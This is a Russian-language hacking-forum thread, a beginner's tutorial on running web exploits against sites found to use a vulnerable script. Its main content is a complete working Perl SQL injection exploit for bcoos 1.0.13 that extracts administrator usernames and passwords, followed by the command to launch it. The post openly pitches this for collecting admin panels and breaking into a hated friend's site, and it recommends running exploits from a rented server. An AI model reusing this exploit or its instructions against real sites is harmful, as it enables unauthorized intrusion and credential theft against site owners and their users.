Как использовать эксплоиты? Для новичков

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Данная статья является пособием для новичков, в ней будет рассказано о том, как юзать эксплоиты для веб приложений.

Не знаю как сейчас обстоят дела с этой темой, но когда она была интересна мне - я не нашел никакого материала.

По сути, запуск эксплойтов вещь очень простая, все происходит по принципу "Нажал на кнопку - получил банан"



Ну а теперь переходим к самой сути, первое что тебе нужно знать, наверное это то, что такое эксплоит.



Эксплойт (англ. exploit — использовать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода, который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.

Для чего же они нужны? Эти експлоиты?

На самом деле все просто, вот допустим понадобилась тебе пачка админок (хотя бы штук 10) и ты не перерываешь кучу сайтов в поисках иньекци, xss и т.п. А находишь свежий эксплоит, находишь сайты на которых стоит уязвимый скрипт, запускаешь - получаешь пароли! Или ты ломаешь сайт ненавистного друга, на нем стоит популярная CMS c кучей модулей, попробуй-ка найди багу

Проще найти эксплоит и заюзать!

Я буду говорить только об удаленных эксплоитах. Это означает то, что вы не должны иметь доступ к компьютеру чтобы воспользоваться эксплоитом.

Эксплоиты в большинстве своем пишутся на таких языках как СИ и Perl (но есть и на множестве других, PHP например). Их можно найти на сайтах securitylab.ru(рус.), milw0rm.com(англ.).

Как же использовать этих "зверюшек"? На самом деле все очень просто, достаточно скачать нужный тебе эксплоит и запустить с требуемыми параметрами! Давай потренируемся? В виде подопытного кролика будем использовать CMS bcoos версии 1.0.13.

Вот код самого эксплоита:
Python:
#!/usr/bin/perl -w
#============================================
# bcoos 1.0.13 Remote SQL Injection Exploit
#============================================
#
# ,--^----------,--------,-----,-------^--,
# | ||||||||| '--------' | O .. CWH Underground Hacking Team ..
# '+---------------------------^----------|
# '\_,-------, _________________________|
# / XXXXXX /'| /
# / XXXXXX / '\ /
# / XXXXXX /\______(
# / XXXXXX /
# / XXXXXX /
# (________(
# '------'
#
#AUTHOR : CWH Underground
#DATE : 1 December 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : bcoos
#VERSION : 1.0.13 (Prior versions also maybe affected)
#VENDOR : http://www.bcoos.net/
#DOWNLOAD : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip
######################################################
#
#Note: magic_quotes_gpc = off
#Addresses Modules Must be Installed
#
################################################################################
#######
#Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
################################################################################
#######


use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
print "\n==============================================\n";
print " Bcoos Remote SQL Injection Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==============================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| '--------' | O \n";
print " '+---------------------------^----------| \n";
print " '\_,-------, _________________________| \n";
print " / XXXXXX /'| / \n";
print " / XXXXXX / '\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " '------' \n";
print " \n";
print "Usage : ./xpl.pl <Target> <Data Limit>\n";
print "Example: ./xpl.pl http://www.target.com/bcoos 10\n";
exit();
}

$target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$number = $ARGV[1];

print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "\n ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
print "\n[+]Dump Username and Password\n";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
$req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27+and+1=2+union+select+1,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)+from+bcoos_users+limit+1+offset+".$start."--+and+1=1")or die "Failed to Connect, Try again!\n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n";
}
else {
print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n";
exit;
}
}

Все кто знаком с Perl сразу поймут что делает этот код, те-же кто знаком с другими языками, скорее всего догадаются.

Если-же ты не знаешь ни одного ЯП, то объясняю что делает этот код. Он запрашивает у тебя параметры (в данном случае URL и таймаут), проходи по линку (добавляя туда собственно говоря саму SQL injection), парсит страничку на наличие логина/пароля администратора и выдает тебе! Это все! Как видишь ничего сложного!

Также как и с другими эксплоитами. А вот для запуска, тебе необходим интерпретатор Perl (лучше конечно использовать дедик, где установлены множество компиляторов/интерпретаторов, ведь эксплоиты могу быть написаны на разных языках, а ставить к себе на машину весь этот "груз" не самый замечательный вариант!). Запускается эксплоит очень легко!

Код:
perl exploit_name.pl url timeout

Вот и все! У тебя на руках пароль
 
R

ruslord1

Не хватает инфы для школьников, как установить на свой компик с "видусом" - Perl )
А то начнут через блокнот открывать и писать в теме, что не работает)
 
Не хватает инфы для школьников, как установить на свой компик с "видусом" - Perl )
А то начнут через блокнот открывать и писать в теме, что не работает)

Не думаю, что школьники рыскают тут в поисках инфы по эксплойтам)
 
Похожие темы
yaNaSvyazi [Wealth Whispers] [Udemy] Как использовать ChatGPT для YouTube (2023) Способы заработка 0
Anorali Интересно Как использовать Xploitspy для взлома телефонов Android? Полезные статьи 6
S Как правильно использовать фишинговые рассылки в рамках пентеста (СТАТЬЯ НЕ МОЯ) Полезные статьи 5
K Как использовать гипноз для работы с детьми - Кейн Раздачи и сливы 0
K Кейн - Как Использовать Гипноз Для Работы С Детьми Раздачи и сливы 0
K Интроверты. Как Использовать Особенности Своего Характера https://cloud.mail.ru/public/C8HP/DzGQz3Tdk Раздачи и сливы 0
J Как использовать скорость от провайдера Свободное общение 1
Admin Интересно «Пароль01» и дырявый VPN. Как пустить хакеров в сеть, чтобы они сломали вообще всё (пошаговая инструкция). Новости в сети 0
Admin Статья Как "Казаки" паттерны мошенников-"Разбойников" вычисляют, вооружаясь технологиями. Анонимность и приватность 0
Admin Интересно Ваш сервер — их притон: как группа UAT-7290 сдает ваши сервера в аренду своим друзьям. Дорого. Новости в сети 0
Admin Интересно Как стать «богом» в Linux, просто правильно подгадав время. Спойлер: вам понадобится Chronomaly. Новости в сети 0
Admin Статья Как оставаться незаметным в 2025 году – простые правила оперативной безопасности для всех. Анонимность и приватность 0
Admin Статья HTTP Request Smuggling в 2025: Как обходить современные WAF Уязвимости и взлом 0
Admin Статья Криптография в малвари: Как работают вымогатели (Ransomware). Полезные статьи 0
Admin Статья Право на root. Как повышают привилегии в Linux. Уязвимости и взлом 0
Admin Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 2) Уязвимости и взлом 0
Admin Статья Как простой баг повреждения памяти ядра Linux приводит к полной компрометации системы(Часть 1) Уязвимости и взлом 0
Admin Статья Как Mozilla упустила (не)очевидную уязвимость Уязвимости и взлом 0
Admin Статья Почему ваш «Windows» прокси палится как Linux: Глубокий разбор TCP Window Size, о котором молчат. Анонимность и приватность 0
Admin Интересно Старый конь борозды не испортит. Как сертификат десятилетней давности помог хакерам проникнуть в госучреждения Азии. Новости в сети 0
Admin Статья Direct Syscalls vs EDR: Как заставить Windows выполнять ваши команды в обход хуков защитного ПО Вирусология 0
Admin Интересно Gemini лезет из каждой дыры Chrome? Вот как убить все ИИ-кнопки и вернуть нормальный браузер. Новости в сети 0
Admin Интересно «Здравствуйте, я журналист, заполните анкету». Как хакеры из КНДР «разводят» южнокорейских экспертов. Новости в сети 0
Admin Статья Гейминг как источник данных: OSINT в виртуальных мирах OSINT 0
Admin Статья Крипто-детектив: Идем по следу транзакций. Как деанонить блокчейн. OSINT 0
Admin Интересно Семь миллионов долларов за одну ночь. Рассказываем, как пострадали пользователи Trust Wallet и что делать сейчас. Новости в сети 0
Admin Интересно Казалось, что летим, а на деле — ползём. Как ИИ-помощники незаметно крадут время у профессиональных кодеров. Новости в сети 0
Admin Статья Анонимные мессенджеры: Как общаться, не оставляя следов Анонимность и приватность 0
Admin Интересно Охотник стал добычей. Как «безопасники» ловят вирусы, пытаясь скачать инструменты для их поиска. Новости в сети 0
Admin Интересно Цифровое чудо на Рождество. Как ученым удалось восстановить UNIX V4 с ленты 1970-х годов. Новости в сети 0
Admin Статья Взгляд с другой стороны: как Linux админ ловит вас Полезные статьи 0
Admin Статья Как отслеживается e-mail? OSINT 0
Support81 «Менеджер» с архивом и черным ходом через Yandex. Как группировка APT31 годами шпионила за российскими IT-компаниями Новости в сети 1
Support81 От 314 до 968 млрд рублей. Как российский рынок кибербезопасности станет монополией за 6 лет Новости в сети 0
Support81 Перевод крупной суммы по СБП на свой же счёт будет расцениваться банком как подозрительный Новости в сети 0
Support81 Перехват DNS – что это за атака и как она работает? Новости в сети 0
Support81 Суверенный Рунет. Мишустин подписал постановление о том, как им будут управлять (и от чего защищать) Новости в сети 0
Support81 $120000000 испарились за утро: как хакерам удалось обойти 10 аудитов и причем здесь ракетная программа КНДР Новости в сети 0
Support81 Одна буква — миллионные потери. Как русская «Е» обманула разработчиков и присвоила их крипту Новости в сети 0
Support81 «Ага, туннель! Придушим». Ваш VPN тоже лагает на 4G? Объясняем, как операторы видят ваш трафик (и что с этим делать) Новости в сети 0
Support81 «Магический пакет» творит чудеса: как хакеры превратили Linux-сервер в невидимку Новости в сети 0
Support81 Касперский против ChatGPT: как антивирус вычислил вредонос, написанный ИИ Новости в сети 0
Support81 Не Таиланд, а рабство в Мьянме: как туристический рай стал перевалочной базой для похитителей россиян Новости в сети 0
Support81 Оригинальный соучредитель Tesla, управлявший компанией до прихода Маска, заявил, что Cybertruck выглядит как «мусорный контейнер» Новости в сети 0
wrangler65 Как стать хакером для «самых маленьких» Ч.2 Полезные статьи 0
wrangler65 Как стать хакером для «самых маленьких» Ч.1 Полезные статьи 0
Support81 Как война в Украине стала полигоном для наркокартелей Новости в сети 0
Support81 Вайб-кодинг звучал как шутка, пока Opal от Google не начал делать сайты по вашему описанию Новости в сети 0
Support81 Серые токены, чёрные схемы: как российский бизнес уходит в крипту до принятия закона Новости в сети 1
Support81 Нажали Play — хакер уже в системе. Как работает звуковой троян Новости в сети 0

Название темы